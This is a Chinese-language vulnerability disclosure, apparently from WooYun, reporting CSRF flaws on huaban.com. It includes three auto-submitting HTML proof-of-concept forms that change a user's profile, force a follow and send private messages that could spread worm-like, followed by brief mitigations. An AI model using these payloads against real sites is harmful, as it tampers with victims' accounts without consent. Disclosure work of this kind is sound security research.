花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)(可利用私信功能影响全站注册用户)。

花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)。

poc全部在下方。

本次影响范围:(包括但不限于)

网站用户个人资料篡改。

网站任意用户刷粉丝。

全站用户私信可被蠕虫。

网站用户个人资料篡改:

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>花瓣网CSRF跨站请求伪造安全漏洞POC</title> </head> <body> <form name="name1" action="https://huaban.com/settings/" method="post"> <input type="hidden" name="user[username]" value="argzs"/> <input type="hidden" name="profile[sex]" value="0"/> <input type="hidden" name="profile[about]" value="aryj CSRF!"/> </form> <script> window.onload=function(){ document.name1.submit(); } </script> </body> </html>





网站任意用户刷粉丝:

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>花瓣网CSRF跨站请求伪造安全漏洞POC</title> </head> <body> <form name="name1" action="https://huaban.com/xiaomeihehe2012/follow/" method="post"> </form> <script> window.onload=function(){ document.name1.submit(); } </script> </body> </html>



全站用户私信可被蠕虫:

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>花瓣网CSRF跨站请求伪造安全漏洞POC</title> </head> <body> <form name="name1" action="https://huaban.com/dm/send/" method="post"> <input type="hidden" name="to_user_id" value="13056618"/> <input type="hidden" name="text" value="test by 安然意境@Wooyun"/> </form> <script> window.onload=function(){ document.name1.submit(); } </script> </body> </html>




 

解决方案:

1.验证码被认为是对抗CSRF攻击最简洁有效的防御方法。

2.Referer Check.

3.Anti CSRF Token.